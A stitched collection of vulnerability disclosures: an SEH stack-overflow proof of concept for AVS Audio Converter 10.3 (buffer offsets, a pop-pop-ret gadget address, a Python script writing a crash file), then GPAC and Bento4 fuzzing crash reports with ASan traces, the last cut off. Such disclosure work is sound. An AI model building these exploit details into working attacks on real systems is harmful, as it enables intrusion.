AVS Audio Converter version 10.3 suffers from a stack overflow vulnerability.

    # Exploit Title: AVS Audio Converter 10.3 - Stack Overflow (SEH)# Discovered by: Yehia Elghaly - Mrvar0x# Discovered Date: 2022-10-16# Tested Version: 10.3.1.633# Tested on OS: Windows 7 Professional x86#pop+ret Address=005154E6#Message=  0x005154e6 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [AVSAudioConverter.exe] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v10.3.1.633 (C:\Program Files\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)# The only module that has SafeSEH disabled.# Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | # 0x00400000 | 0x01003000 | False  | False   | False |  False   | False  |#Allocating 4-bytes for nSEH which should be placed directly before SEH which also takes up 4-bytes.#Buffer  = '\x41'* 260#nSEH    = '\x42'*4#SEH     = '\x43'*4#ESI     = 'D*44' # ESI Overwrite #buffer = "A"*260 + [nSEH] + [SEH] + "D"*44#buffer = "A"*260 + "B"*4 + "\xE6\x54\x51\x05" + "D"*44# Rexploit:# Generate the 'evil.txt' payload using python 2.7.x on Linux.# Open the file 'evil.txt' Copy.# Paste at'Output Folder and click 'Browse'.#!/usr/bin/python -w  filename="evil.txt" buffer = "A"*260 + "B"*4 + "C"*4 + "D"*44  textfile = open(filename , 'w')textfile.write(buffer)textfile.close()

AVS Audio Converter 10.3 Stack Overflow

GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a heap buffer overflow via the function gf_isom_box_dump_start_ex at /isomedia/box_funcs.c.

**Description**

Heap-buffer-overflow in isomedia/box\_funcs.c:2074 in gf\_isom\_box\_dump\_start\_ex

**Version**

    $ ./MP4Box -version
    MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D 
    

**Replay**

    git clone https://github.com/gpac/gpac.git
    cd gpac
    ./configure --enable-sanitizer
    make -j$(nproc)
    ./bin/gcc/MP4Box -diso mp4box-diso-heap-buffer-over-flow-1
    

**POC**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/gpac/mp4box-diso-heap-buffer-over-flow-1

**ASAN**

    
    [iso file] Read Box type 04@0004 (0x04400004) at position 94 has size 0 but is not at root/file level. Forbidden, skipping end of parent box !
    [iso file] Box "meta" (start 32) has 206 extra bytes
    [iso file] Box "uuid" (start 4061) has 58 extra bytes
    [iso file] Incomplete box mdat - start 4151 size 54847
    [iso file] Incomplete file while reading for dump - aborting parsing
    =================================================================
    ==18099==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000540 at pc 0x7f54a04dd880 bp 0x7ffcec3ea7e0 sp 0x7ffcec3ea7d0
    READ of size 1 at 0x604000000540 thread T0
        #0 0x7f54a04dd87f in gf_isom_box_dump_start_ex isomedia/box_funcs.c:2074
        #1 0x7f54a04dd87f in gf_isom_box_dump_start isomedia/box_funcs.c:2093
        #2 0x7f54a04c0ae7 in trgt_box_dump isomedia/box_dump.c:5807
        #3 0x7f54a04ddbb8 in gf_isom_box_dump isomedia/box_funcs.c:2108
        #4 0x7f54a0470ffa in gf_isom_box_array_dump isomedia/box_dump.c:104
        #5 0x7f54a04ddda8 in gf_isom_box_dump_done isomedia/box_funcs.c:2115
        #6 0x7f54a04c09d5 in trgr_box_dump isomedia/box_dump.c:5799
        #7 0x7f54a04ddbb8 in gf_isom_box_dump isomedia/box_funcs.c:2108
        #8 0x7f54a04714d6 in gf_isom_dump isomedia/box_dump.c:138
        #9 0x55e8639f1804 in dump_isom_xml /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/filedump.c:2067
        #10 0x55e8639c1d79 in mp4box_main /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/mp4box.c:6364
        #11 0x7f549f4e0c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #12 0x55e8639920a9 in _start (/home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/bin/gcc/MP4Box+0x4e0a9)
    
    0x604000000540 is located 0 bytes to the right of 48-byte region [0x604000000510,0x604000000540)
    allocated by thread T0 here:
        #0 0x7f54a2a4cb40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
        #1 0x7f54a041bd12 in trgt_box_new isomedia/box_code_base.c:10623
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/box_funcs.c:2074 in gf_isom_box_dump_start_ex
    Shadow bytes around the buggy address:
      0x0c087fff8050: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
      0x0c087fff8060: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 fa
      0x0c087fff8070: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 fa
      0x0c087fff8080: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
      0x0c087fff8090: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 00
    =>0x0c087fff80a0: fa fa 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
      0x0c087fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c087fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c087fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c087fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c087fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==18099==ABORTING
    

**Environment**

    Ubuntu 16.04
    Clang 10.0.1
    gcc 5.5

CVE-2022-43040: heap-buffer-overflow isomedia/box_funcs.c:2074 in gf_isom_box_dump_start_ex · Issue #2280 · gpac/gpac

GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function BD_CheckSFTimeOffset at /bifs/field_decode.c.

**Description**

SEGV in BD\_CheckSFTimeOffset bifs/field\_decode.c:58

**Version**

    $ ./MP4Box -version
    MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D 
    

**Replay**

    git clone https://github.com/gpac/gpac.git
    cd gpac
    ./configure --enable-sanitizer
    make -j$(nproc)
    ./bin/gcc/MP4Box -bt mp4box-bt-segv-0
    

**POC**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/gpac/mp4box-bt-segv-0

**ASAN**

    
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent minf
    [iso file] Missing DataInformationBox
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Read Box type 0000 (0x30303030) at position 11542 has size 0 but is not at root/file level. Forbidden, skipping end of parent box !
    [iso file] Box "moov" (start 20) has 806 extra bytes
    [iso file] Unknown top-level box type 0000
    [iso file] Incomplete box 0000 - start 12356 size 808358436
    [iso file] Incomplete file while reading for dump - aborting parsing
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent minf
    [iso file] Missing DataInformationBox
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Read Box type 0000 (0x30303030) at position 11542 has size 0 but is not at root/file level. Forbidden, skipping end of parent box !
    [iso file] Box "moov" (start 20) has 806 extra bytes
    [iso file] Unknown top-level box type 0000
    [iso file] Incomplete box 0000 - start 12356 size 808358436
    [iso file] Incomplete file while reading for dump - aborting parsing
    MPEG-4 BIFS Scene Parsing
    [ODF] Reading bifs config: shift in sizes (not supported)
    ASAN:DEADLYSIGNAL                 | (00/100)
    =================================================================
    ==64022==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000001 (pc 0x7f4bf2457608 bp 0x7fff7805fc00 sp 0x7fff7805f360 T0)
    ==64022==The signal is caused by a READ memory access.
    ==64022==Hint: address points to the zero page.
        #0 0x7f4bf2457607  (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b607)
        #1 0x7f4befd4dd1a in BD_CheckSFTimeOffset bifs/field_decode.c:58
        #2 0x7f4befd53e80 in gf_bifs_dec_sf_field bifs/field_decode.c:105
        #3 0x7f4befd6a1be in BM_XReplace bifs/memory_decoder.c:355
        #4 0x7f4befd6a1be in BM_ParseExtendedUpdates bifs/memory_decoder.c:398
        #5 0x7f4befd754ad in BM_ParseInsert bifs/memory_decoder.c:586
        #6 0x7f4befd754ad in BM_ParseCommand bifs/memory_decoder.c:908
        #7 0x7f4befd7660d in gf_bifs_decode_command_list bifs/memory_decoder.c:1038
        #8 0x7f4bf0743bc6 in gf_sm_load_run_isom scene_manager/loader_isom.c:303
        #9 0x562cf53f8dd7 in dump_isom_scene /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/filedump.c:207
        #10 0x562cf53d37ff in mp4box_main /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/mp4box.c:6336
        #11 0x7f4beef6ec86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #12 0x562cf53a50a9 in _start (/home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/bin/gcc/MP4Box+0x4e0a9)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b607) 
    ==64022==ABORTING
    

**Environment**

    Ubuntu 16.04
    Clang 10.0.1
    gcc 5.5

CVE-2022-43043: SEGV BD_CheckSFTimeOffset bifs/field_decode.c:58 · Issue #2276 · gpac/gpac

GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function gf_dump_vrml_sffield at /scene_manager/scene_dump.c.

**Description**

SEGV scene\_manager/scene\_dump.c:693 in gf\_dump\_vrml\_sffield

**Version**

    $ ./MP4Box -version
    MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D 
    

**Replay**

    git clone https://github.com/gpac/gpac.git
    cd gpac
    ./configure --enable-sanitizer
    make -j$(nproc)
    ./bin/gcc/MP4Box -bt mp4box-bt-segv-1
    

**POC**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/gpac/mp4box-bt-segv-1

**ASAN**

    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent minf
    [iso file] Missing DataInformationBox
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Read Box type 0000 (0x30303030) at position 11542 has size 0 but is not at root/file level. Forbidden, skipping end of parent box !
    [iso file] Box "moov" (start 20) has 806 extra bytes
    [iso file] Unknown top-level box type 0000
    [iso file] Incomplete box 0000 - start 12356 size 808358436
    [iso file] Incomplete file while reading for dump - aborting parsing
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent minf
    [iso file] Missing DataInformationBox
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Read Box type 0000 (0x30303030) at position 11542 has size 0 but is not at root/file level. Forbidden, skipping end of parent box !
    [iso file] Box "moov" (start 20) has 806 extra bytes
    [iso file] Unknown top-level box type 0000
    [iso file] Incomplete box 0000 - start 12356 size 808358436
    [iso file] Incomplete file while reading for dump - aborting parsing
    MPEG-4 BIFS Scene Parsing
    [ODF] Reading bifs config: shift in sizes (not supported)
    [MP4 Loading] Unable to fetch sample 38 from track ID 8 - aborting track import
    Scene loaded - dumping 1 systems streams
    ASAN:DEADLYSIGNAL
    =================================================================
    ==42376==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x7f6a20c34c94 bp 0x60b000000720 sp 0x7ffd44396130 T0)
    ==42376==The signal is caused by a READ memory access.
    ==42376==Hint: address points to the zero page.
        #0 0x7f6a20c34c93 in gf_dump_vrml_sffield scene_manager/scene_dump.c:693
        #1 0x7f6a20c69012 in gf_dump_vrml_simple_field scene_manager/scene_dump.c:775
        #2 0x7f6a20c5020c in DumpXReplace scene_manager/scene_dump.c:2291
        #3 0x7f6a20c5020c in gf_sm_dump_command_list scene_manager/scene_dump.c:2901
        #4 0x7f6a20c77d57 in gf_sm_dump scene_manager/scene_dump.c:3519
        #5 0x556786082cef in dump_isom_scene /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/filedump.c:221
        #6 0x55678605d7ff in mp4box_main /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/mp4box.c:6336
        #7 0x7f6a1f3bac86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #8 0x55678602f0a9 in _start (/home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/bin/gcc/MP4Box+0x4e0a9)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV scene_manager/scene_dump.c:693 in gf_dump_vrml_sffield
    ==42376==ABORTING
    

**Environment**

    Ubuntu 16.04
    Clang 10.0.1
    gcc 5.5

CVE-2022-43045: SEGV scene_manager/scene_dump.c:693 in gf_dump_vrml_sffield · Issue #2277 · gpac/gpac

GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function gf_isom_get_meta_item_info at /isomedia/meta.c.

**Description**

SEGV in isomedia/meta.c:177 in gf\_isom\_get\_meta\_item\_info

**Version**

    $ ./MP4Box -version
    MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D 
    

**Replay**

    git clone https://github.com/gpac/gpac.git
    cd gpac
    ./configure --enable-sanitizer
    make -j$(nproc)
    ./bin/gcc/MP4Box -info mp4box-info-segv-1
    

**POC**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/gpac/mp4box-info-segv-1

**ASAN**

    [iso file] Unknown box type i000000 in parent iinf
    [iso file] Unknown top-level box type v000000
    [iso file] Incomplete box v000000 - start 308 size 191662031
    [iso file] Incomplete file while reading for dump - aborting parsing
    # File Meta type: "Meta" - 3 resource item(s)
    ASAN:DEADLYSIGNAL
    =================================================================
    ==52314==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000028 (pc 0x7f4d67b428f9 bp 0x000000000000 sp 0x7ffcd749c3c0 T0)
    ==52314==The signal is caused by a READ memory access.
    ==52314==Hint: address points to the zero page.
        #0 0x7f4d67b428f8 in gf_isom_get_meta_item_info isomedia/meta.c:177
        #1 0x55fa2660a89e in DumpMetaItem /gpac/applications/mp4box/filedump.c:2467
        #2 0x55fa26642cc8 in DumpMovieInfo /gpac/applications/mp4box/filedump.c:3820
        #3 0x55fa265efee4 in mp4box_main /gpac/applications/mp4box/mp4box.c:6359
        #4 0x7f4d669cfc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #5 0x55fa265c00a9 in _start (/gpac/bin/gcc/MP4Box+0x4e0a9)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV isomedia/meta.c:177 in gf_isom_get_meta_item_info
    ==52314==ABORTING
    

**Environment**

    Ubuntu 16.04
    Clang 10.0.1
    gcc 5.5

CVE-2022-43044: SEGV isomedia/meta.c:177 in gf_isom_get_meta_item_info · Issue #2282 · gpac/gpac

GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function gf_isom_meta_restore_items_ref at /isomedia/meta.c.

**Description**

SEGV in isomedia/meta.c:1929 in gf\_isom\_meta\_restore\_items\_ref

**Version**

    $ ./MP4Box -version
    MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D 
    

**Replay**

    git clone https://github.com/gpac/gpac.git
    cd gpac
    ./configure --enable-sanitizer
    make -j$(nproc)
    ./bin/gcc/MP4Box -info mp4box-info-segv-0
    

**POC**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/gpac/mp4box-info-segv-0

**ASAN**

    [iso file] Read Box type 0003E8d (0x0003E864) at position 653 has size 0 but is not at root/file level. Forbidden, skipping end of parent box !
    [iso file] Missing DataInformationBox
    [iso file] Box "minf" (start 645) has 3400 extra bytes
    [iso file] Track with no sample table !
    [iso file] Track with no sample description box !
    [isom] not enough bytes in box A9too: 29 left, reading 41 (file isomedia/box_code_apple.c, line 117)
    [iso file] Read Box "A9too" (start 4122) failed (Invalid IsoMedia File) - skipping
    [iso file] Read Box "ilst" (start 4114) failed (Invalid IsoMedia File) - skipping
    [iso file] Read Box type 000000! (0x00000021) at position 4077 has size 0 but is not at root/file level. Forbidden, skipping end of parent box !
    [iso file] Box "meta" (start 4069) has 74 extra bytes
    ASAN:DEADLYSIGNAL
    =================================================================
    ==57686==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000002c (pc 0x7fb4c621a438 bp 0x000000000000 sp 0x7fff370fe330 T0)
    ==57686==The signal is caused by a READ memory access.
    ==57686==Hint: address points to the zero page.
        #0 0x7fb4c621a437 in gf_isom_meta_restore_items_ref isomedia/meta.c:1929
        #1 0x7fb4c60c4127 in gf_isom_parse_movie_boxes_internal isomedia/isom_intern.c:429
        #2 0x7fb4c60d00e5 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:866
        #3 0x7fb4c60d00e5 in gf_isom_open_file isomedia/isom_intern.c:986
        #4 0x5627a34e0048 in mp4box_main /gpac/applications/mp4box/mp4box.c:6175
        #5 0x7fb4c5089c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #6 0x5627a34b30a9 in _start (/gpac/bin/gcc/MP4Box+0x4e0a9)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV isomedia/meta.c:1929 in gf_isom_meta_restore_items_ref
    ==57686==ABORTING
    

**Environment**

    Ubuntu 16.04
    Clang 10.0.1
    gcc 5.5

CVE-2022-43039: SEGV isomedia/meta.c:1929 in gf_isom_meta_restore_items_ref · Issue #2281 · gpac/gpac

GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a heap buffer overflow via the function FixSDTPInTRAF at isomedia/isom_intern.c.

**Description**

Heap-buffer-overflow in isomedia/isom\_intern.c:227 in FixSDTPInTRAF

**Version**

    $ ./MP4Box -version
    MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D 
    

**Replay**

    git clone https://github.com/gpac/gpac.git
    cd gpac
    ./configure --enable-sanitizer
    make -j$(nproc)
    ./bin/gcc/MP4Box -bt mp4box-bt-heap-buffer-over-flow-0
    

**POC**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/gpac/mp4box-bt-heap-buffer-over-flow-0

**ASAN**

    [iso file] Unknown box type sjhm in parent sinf
    [iso file] Unknown box type sgp00 in parent stbl
    [iso file] Read Box type 00000000 (0x00000000) at position 2168 has size 0 but is not at root/file level. Forbidden, skipping end of parent box !
    [iso file] Box "traf" (start 2028) has 458 extra bytes
    [iso file] Unknown box type shgp in parent traf
    =================================================================
    ==31145==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001914 at pc 0x7fe0339cbbf8 bp 0x7ffc2041a330 sp 0x7ffc2041a320
    READ of size 1 at 0x602000001914 thread T0
        #0 0x7fe0339cbbf7 in FixSDTPInTRAF isomedia/isom_intern.c:227
        #1 0x7fe0339cbbf7 in gf_isom_parse_movie_boxes_internal isomedia/isom_intern.c:663
        #2 0x7fe0339ce0e5 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:866
        #3 0x7fe0339ce0e5 in gf_isom_open_file isomedia/isom_intern.c:986
        #4 0x55ec82396048 in mp4box_main /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/mp4box.c:6175
        #5 0x7fe032987c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #6 0x55ec823690a9 in _start (/home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/bin/gcc/MP4Box+0x4e0a9)
    
    0x602000001914 is located 0 bytes to the right of 4-byte region [0x602000001910,0x602000001914)
    allocated by thread T0 here:
        #0 0x7fe035ef3b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
        #1 0x7fe0338a4541 in sdtp_box_read isomedia/box_code_base.c:8354
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/isom_intern.c:227 in FixSDTPInTRAF
    Shadow bytes around the buggy address:
      0x0c047fff82d0: fa fa 00 00 fa fa 00 00 fa fa 01 fa fa fa 00 00
      0x0c047fff82e0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa fd fa
      0x0c047fff82f0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
      0x0c047fff8300: fa fa 00 fa fa fa 00 00 fa fa 00 07 fa fa 00 00
      0x0c047fff8310: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 00
    =>0x0c047fff8320: fa fa[04]fa fa fa 00 00 fa fa 00 00 fa fa fa fa
      0x0c047fff8330: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==31145==ABORTING
    

**Environment**

    Ubuntu 16.04
    Clang 10.0.1
    gcc 5.5

CVE-2022-43042: heap-buffer-overflow isomedia/isom_intern.c:227 in FixSDTPInTRAF · Issue #2278 · gpac/gpac

An issue was discovered in Bento4 v1.6.0-639. There is a heap buffer overflow vulnerability in the AP4_BitReader::SkipBits(unsigned int) function in mp42ts.

Hi, developers of Bento4:  
In the test of the binary mp42ts instrumented with ASAN. There are some inputs causing heap-buffer-overflow. Here is the ASAN mode output:

\==10897==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000ec3c at pc 0x0000004a9771 bp 0x7fffffffb150 sp 0x7fffffffb140  
READ of size 4 at 0x60300000ec3c thread T0  
#0 0x4a9770 in AP4\_BitReader::SkipBits(unsigned int) /root/Bento4/Source/C++/Core/Ap4Utils.cpp:564  
#1 0x53f5c5 in AP4\_Dac4Atom::AP4\_Dac4Atom(unsigned int, unsigned char const\*) /root/Bento4/Source/C++/Core/Ap4Dac4Atom.cpp:396  
#2 0x543230 in AP4\_Dac4Atom::Create(unsigned int, AP4\_ByteStream&) /root/Bento4/Source/C++/Core/Ap4Dac4Atom.cpp:58  
#3 0x4f7503 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:776  
#4 0x4fc596 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#5 0x51cd08 in AP4\_ContainerAtom::ReadChildren(AP4\_AtomFactory&, AP4\_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194  
#6 0x4826d1 in AP4\_SampleEntry::Read(AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:115  
#7 0x4826d1 in AP4\_AudioSampleEntry::AP4\_AudioSampleEntry(unsigned int, unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:420  
#8 0x5d736d in AP4\_EncaSampleEntry::AP4\_EncaSampleEntry(unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4Protection.cpp:74  
#9 0x4f4a3c in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:298  
#10 0x4fc596 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#11 0x614618 in AP4\_StsdAtom::AP4\_StsdAtom(unsigned int, unsigned char, unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:101  
#12 0x615fc0 in AP4\_StsdAtom::Create(unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:57  
#13 0x4f838e in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:458  
